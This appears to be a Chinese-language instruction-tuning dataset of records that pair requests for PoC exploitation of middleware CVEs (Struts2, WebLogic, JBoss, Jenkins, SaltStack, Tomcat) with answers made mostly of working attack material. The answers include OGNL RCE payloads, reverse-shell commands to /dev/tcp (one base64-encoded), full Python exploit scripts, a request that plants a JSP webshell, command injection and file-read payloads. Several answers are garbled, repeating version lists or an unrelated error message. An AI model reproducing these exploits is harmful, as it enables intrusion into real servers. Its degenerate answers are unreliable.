  150. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zabbix SAML身份绕过漏洞 CVE-2022-23131\n漏洞描述:Zabbix 是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 Zabbix 由两部分构成,Zabbix Server与可选组件 Zabbix Agent。Zabbix Server 可以通过 SNMP、Zabbix Agent、Ping、端口监视等方法提供对远程服务器/网络状态的监视、数据收集等功能,它可以运行在 Linux、Solaris、HP-UX、AIX、Free BSD、Open BSD、OS X等平台上。 在启用 SAML SSO 身份验证(非默认)的情况下,未经身份验证的攻击者可以通过修改Cookie数据,绕过身份认证获得对 Zabbix 前端的管理员访问权限。\n影响版本:``` Zabbix 4.0.36 Zabbix 5.4.0 Zabbix 5.4.8 Zabbix 6.0.0alpha1 ```\n网络测绘:``` app=\"ZABBIX-监控系统\" && body=\"saml\" ``` ``` title:\"ZABBIX\" ``` ``` title=\"ZABBIX\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-23131\n【POC利用方法】\n1. Zabbix 4.0.36\nZabbix 5.4.0\nZabbix 5.4.8\nZabbix 6.0.0alpha1\n2. app=\"ZABBIX-监控系统\" && body=\"saml\"\n3. title:\"ZABBIX\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Zabbix SAML身份绕过漏洞 CVE-2022-23131.md"}
    151. 

  151. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-057 远程代码执行漏洞 CVE-2018-11776\n漏洞描述:漏洞详情: - https://cwiki.apache.org/confluence/display/WW/S2-057 - https://lgtm.com/blog/apache_struts_CVE-2018-11776 - https://xz.aliyun.com/t/2618 - https://mp.weixin.qq.com/s/iBLrrXHvs7agPywVW7TZrg\n影响版本:影响版本:Struts <= 2.3.34、Struts 2.5.16\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-11776\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action\n3. ${\n(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-057 远程代码执行漏洞 CVE-2018-11776.md"}
    152. 

  152. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-053 远程代码执行漏洞\n漏洞描述:漏洞详情: - http://struts.apache.org/docs/s2-053.html - https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&mid=2247483663&idx=1&sn=6304e1469f23c33728ab5c73692b675e\n影响版本:影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-053 远程代码执行漏洞.md"}
    153. 

  153. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371\n漏洞描述:2022年1月19日,绿盟科技CERT监测发现Oracle官方发布了1月关键补丁更新公告CPU(Critical Patch Update),此次共修复了497个不同程度的漏洞,此次安全更新涉及Oracle WebLogic Server、Oracle MySQL、Oracle Java SE、Oracle FusionMiddleware、Oracle Retail Applications等多个常用产品。Oracle强烈建议客户尽快应用关键补丁更新修复程序,对漏洞进行修复。\n影响版本:``` WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-21371\n【POC利用方法】\n1. WebLogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0\n2. .//META-INF/MANIFEST.MF\n.//WEB-INF/web.xml\n.//WEB-INF/portlet.xml\n.//WEB-INF/weblogic.xml\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371.md"}
    154. 

  154. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-046 远程代码执行漏洞 CVE-2017-5638\n漏洞描述:漏洞详情: - https://cwiki.apache.org/confluence/display/WW/S2-046 - https://xz.aliyun.com/t/221\n影响版本:影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-5638\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. import socket\n\nq = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2\nContent-Disposition: form-data; name=\"upload\"; filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\\x00b\"\nContent-Type: text/plain\n\nfoo\n------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\\n', b'\\r\\n')\np = b'''POST / HTTP/1.1\nHost: localhost:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.8,es;q=0.6\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2\nContent-Length: %d\n\n'''.replace(b'\\n', b'\\r\\n') % (len(q), )\n\nwith socket.create_connection(('your-ip', '8080'), timeout=5) as conn:\n    conn.send(p + q)\n    print(conn.recv(10240).decode())\n3. Content-Disposition: form-data; name=\"upload\"; filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\\x00b\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-046 远程代码执行漏洞 CVE-2017-5638.md"}
    155. 

  155. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353\n漏洞描述:攻击者可以将序列化的Java SignedObject对象,传输到基于远程处理的Jenkins CLI,这将最终造成反序列化,进而绕过现有基于黑名单的保护机制。 参考阅读 https://blogs.securiteam.com/index.php/archives/3171\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-1000353\n【POC利用方法】\n1. docker-compose up -d\n2. java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser \"touch /tmp/success\"\n# jenkins_poc.ser是生成的字节码文件名\n# \"touch ...\"是待执行的任意命令\n3. java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar p.ser \"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md"}
    156. 

  156. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic < 10.3.6 wls-wsat XMLDecoder 反序列化漏洞 CVE-2017-10271\n漏洞描述:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 参考链接: - https://www.exploit-db.com/exploits/43458/ - https://paper.seebug.org/487/ - [https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices组件反序列化漏洞分析.md](https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices组件反序列化漏洞分析.md) - http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-10271\n【POC利用方法】\n1. docker-compose up -d\n2. POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: your-ip:7001\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: text/xml\nContent-Length: 633\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soapenv:Header>\n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n<java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n<void class=\"java.lang.ProcessBuilder\">\n<array class=\"java.lang.String\" length=\"3\">\n<void index=\"0\">\n<string>/bin/bash</string>\n</void>\n<void index=\"1\">\n<string>-c</string>\n</void>\n<void index=\"2\">\n<string>bash -i &gt;&amp; /dev/tcp/192.168.174.128/9999 0&gt;&amp;1</string>\n</void>\n</array>\n<void method=\"start\"/></void>\n</java>\n</work:WorkContext>\n</soapenv:Header>\n<soapenv:Body/>\n</soapenv:Envelope>\n3. POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: your-ip:7001\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: text/xml\nContent-Length: 638\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n    <java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n    <object class=\"java.io.PrintWriter\"> \n    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>\n    <void method=\"println\"><string>\n    <![CDATA[\n    <% if(\"poc\".equals(request.getParameter(\"pwd\"))){\n    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream();\n    int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\");\n            while((a=in.read(b))!=-1){\n                out.println(new String(b,0,a));\n            }\n            out.print(\"</pre>\");\n        }\n    %>\n    ]]>\n    </string>\n    </void>\n    <void method=\"close\"/>\n    </object></java></java>\n    </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic  10.3.6 wls-wsat XMLDecoder 反序列化漏洞 CVE-2017-10271.md"}
    157. 

  157. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 管理控制台未授权远程命令执行漏洞 CVE-2020-14882+CVE-2020-14883\n漏洞描述:Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 参考链接: - https://www.oracle.com/security-alerts/cpuoct2020traditional.html - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-14882\n【POC利用方法】\n1. docker-compose up -d\n2. VulnType         \"poc-yaml-weblogic-cve-2020-14750/default\"\nlinks            [\"https://www.oracle.com/security-alerts/alert-cve-2020-14750.html\"]\nweblogic_version \"10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\"\n3. http://your-ip:7001/console/css/%252e%252e%252fconsole.portal\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic 管理控制台未授权远程命令执行漏洞 CVE-2020-14882+CVE-2020-14883.md"}
    158. 

  158. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501\n漏洞描述:这是经典的JBoss反序列化漏洞,JBoss在`/invoker/JMXInvokerServlet`请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 参考文档: - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://www.seebug.org/vuldb/ssvid-89723 - http://www.freebuf.com/sectool/88908.html - https://paper.seebug.org/312/\n影响版本:``` JBoss AS 4.x及之前版本 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2015-7501\n【POC利用方法】\n1. JBoss AS 4.x及之前版本\n2. docker-compose up -d\n3. #! /usr/bin/env python2\n\n# Jboss Java Deserialization RCE (CVE-2015-7501)\n# Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport argparse\nimport sys, os\n#from binascii import hexlify, unhexlify\nfrom subprocess import check_output\n\nysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']\nysoserial_path = None\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')\nparser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif not args.ysoserial_path:\n    for path in ysoserial_default_paths:\n        if os.path.exists(path):\n            ysoserial_path = path\nelse:\n    if os.path.exists(args.ysoserial_path):\n        ysoserial_path = args.ysoserial_path\n\nif ysoserial_path is None:\n    print('[-] Could not find ysoserial JAR file')\n    sys.exit(1)\n\nif len(args.target.split(\":\")) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nip, port = args.target.split(':')\n\nprint('[*] Target IP: {}'.format(ip))\nprint('[*] Target PORT: {}'.format(port))\n\ngadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])\n\nr = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)\n\nif r.status_code == 200:\n    print('[+] Command executed successfully')\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501.md"}
    159. 

  159. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:muhttpd 任意文件读取漏洞 CVE-2022-31793\n漏洞描述:muhttpd(mu-HTTP-deamon)是一个简单但完整的web服务器,用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权,并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。 muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件。\n影响版本:``` muhttpd 1.1.7 ```\n网络测绘:``` \"2017 ARRIS Enterprises,\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2022-31793\n【POC利用方法】\n1. muhttpd 1.1.7\n2. \"2017 ARRIS Enterprises,\"\n3. a/etc/passwd\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/muhttpd 任意文件读取漏洞 CVE-2022-31793.md"}
    160. 

  160. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack 命令注入漏洞 CVE-2020-16846\n漏洞描述:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞,其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令。 参考链接: - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-16846\n【POC利用方法】\n1. docker-compose up -d\n2. POST /run HTTP/1.1\nHost: 127.0.0.1:8000\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: application/x-yaml\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 87\n\ntoken=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/awesome_poc%3b\n3. - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/SaltStack 命令注入漏洞 CVE-2020-16846.md"}
    161. 

  161. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935\n漏洞描述:2020年11月06日,360CERT监测发现`@RedTeamPentesting`发布了`Tomcat WebSokcet 拒绝服务漏洞` 的分析报告该漏洞编号为 `CVE-2020-13935` ,漏洞等级:`高危` ,漏洞评分:`7.5` 。 未授权的远程攻击者通过发送 `大量特制请求包` 到Tomcat服务器 ,可造成服务器停止响应并无法提供正常服务\n影响版本:``` Apache Tomcat 10.0.0-M1-10.0.0-M6 Apache Tomcat 9.0.0.M1-9.0.36 Apache Tomcat 8.5.0-8.5.56 Apache Tomcat 7.0.27-7.0.104 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13935\n【POC利用方法】\n1. Apache Tomcat 10.0.0-M1-10.0.0-M6\nApache Tomcat 9.0.0.M1-9.0.36\nApache Tomcat 8.5.0-8.5.56\nApache Tomcat 7.0.27-7.0.104\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/tomcat/CVE-2020-1938\ndocker-compose up -d\n3. go: github.com/gorilla/websocket@v1.4.2: Get \"https://proxy.golang.org/github.com/gorilla/websocket/@v/v1.4.2.mod\": dial tcp 172.217.160.81:443: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat WebSocket 拒绝服务漏洞 CVE-2020-13935.md"}
    162. 

  162. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins XStream 反序列化漏洞 CVE-2016-0792\n漏洞描述:国外网站`Contrast Security`于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用API服务致使的命令执行漏洞详情。通过低权限用户构造一个恶意的XML文档发送至服务端接口,使服务端解析时调用API执行外部命令。\n影响版本:``` jenkins版本小于1.650(1.650版本已修复该问题) ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-0792\n【POC利用方法】\n1. jenkins版本小于1.650(1.650版本已修复该问题)\n2. #! /usr/bin/env python2\n\n#Jenkins Groovy XML RCE (CVE-2016-0792)\n#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nip, port = args.target.split(':')\n\nprint('[*] Target IP: {}'.format(ip))\nprint('[*] Target PORT: {}'.format(port))\n\nxml_formatted = ''\ncommand_list = args.command.split()\nfor cmd in command_list:\n    xml_formatted += '{:>16}<string>{}</string>\\n'.format('', cmd)\n\nxml_payload = '''<map>\n  <entry>\n    <groovy.util.Expando>\n      <expandoProperties>\n        <entry>\n          <string>hashCode</string>\n          <org.codehaus.groovy.runtime.MethodClosure>\n            <delegate class=\"groovy.util.Expando\" reference=\"../../../..\"/>\n            <owner class=\"java.lang.ProcessBuilder\">\n              <command>\n                {}\n              </command>\n              <redirectErrorStream>false</redirectErrorStream>\n            </owner>\n            <resolveStrategy>0</resolveStrategy>\n            <directive>0</directive>\n            <parameterTypes/>\n            <maximumNumberOfParameters>0</maximumNumberOfParameters>\n            <method>start</method>\n          </org.codehaus.groovy.runtime.MethodClosure>\n        </entry>\n      </expandoProperties>\n    </groovy.util.Expando>\n   <int>1</int>\n </entry>\n</map>'''.format(xml_formatted.strip())\n\nprint('[*] Generated XML payload:')\nprint(xml_payload)\nprint() \n\nprint('[*] Sending payload')\nheaders = {'Content-Type': 'text/xml'}\nr = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)\n\npaths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\\\rand_dir\\\\config.xml']\nif r.status_code == 500:\n    for path in paths_in_trace:\n        if path in r.text:\n            print('[+] Command executed successfully')\n            break\n3. parser.add_argument('target', type=str, help='Target IP:PORT')\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins XStream 反序列化漏洞 CVE-2016-0792.md"}
    163. 

  163. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-059 远程代码执行漏洞 CVE-2019-0230\n漏洞描述:Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 参考链接: - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776\n影响版本:影响版本: Struts 2.0.0 - Struts 2.5.20\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-0230\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. import requests\n\nurl = \"http://192.168.174.128:8080\"\ndata1 = {\n    \"id\": \"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}\"\n}\ndata2 = {\n    \"id\": \"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/awesome_poc'))}\"\n}\nres1 = requests.post(url, data=data1)\n# print(res1.text)\nres2 = requests.post(url, data=data2)\n# print(res2.text)\n3. echo \"bash -i >& /dev/tcp/192.168.174.128/9999 0>&1\" > shell.sh\npython3环境下:python -m http.server 80\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-059 远程代码执行漏洞 CVE-2019-0230.md"}
    164. 

  164. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Tomcat8 弱口令+后台getshell漏洞\n漏洞描述:Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: - manager(后台管理) - manager-gui 拥有html页面权限 - manager-status 拥有查看status的权限 - manager-script 拥有text接口的权限,和status权限 - manager-jmx 拥有jmx权限,和status权限 - host-manager(虚拟主机管理) - admin-gui 拥有html页面权限 - admin-script 拥有text接口权限 这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html 在`conf/tomcat-users.xml`文件中配置用户的权限: ``` <?xml version=\"1.0\" encoding=\"UTF-8\"?> <tomcat-users xmlns=\"http://tomcat.apache.org/xml\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://tomcat.apache.org/xml tomcat-users.xsd\" version=\"1.0\"> <role rolename=\"manager-gui\"/> <role rolename=\"manager-script\"/> <role rolename=\"manager-jmx\"/> <role rolename=\"manager-status\"/> <role rolename=\"admin-gui\"/> <role rolename=\"admin-script\"/> <user username=\"tomcat\" password=\"tomcat\" roles=\"manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script\" /> </tomcat-users> ``` 可见,用户tomcat拥有上述所有权限,密码是`tomcat`。 正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。\n影响版本:Tomcat版本:8.0\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<tomcat-users xmlns=\"http://tomcat.apache.org/xml\"\n              xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n              xsi:schemaLocation=\"http://tomcat.apache.org/xml tomcat-users.xsd\"\n              version=\"1.0\">\n\n    <role rolename=\"manager-gui\"/>\n    <role rolename=\"manager-script\"/>\n    <role rolename=\"manager-jmx\"/>\n    <role rolename=\"manager-status\"/>\n    <role rolename=\"admin-gui\"/>\n    <role rolename=\"admin-script\"/>\n    <user username=\"tomcat\" password=\"tomcat\" roles=\"manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script\" />\n    \n</tomcat-users>\n2. docker-compose up -d\n3. ┌──(root kali)-[/home/kali]\n└─# msfconsole\n\n# 搜索tomcat相关模块\nmsf6 > search tomcat\n...\n   23  auxiliary/scanner/http/tomcat_mgr_login\tnormal     No     Tomcat Application Manager Login Utility\n...\n\n# 使用tomcat_mgr_login模块进行爆破\nmsf6 > use auxiliary/scanner/http/tomcat_mgr_login\n\n# 设置服务地址\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) >show options\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <your-ip>\nRHOSTS => <your-ip>\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > run\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Tomcat8 弱口令+后台getshell漏洞.md"}
    165. 

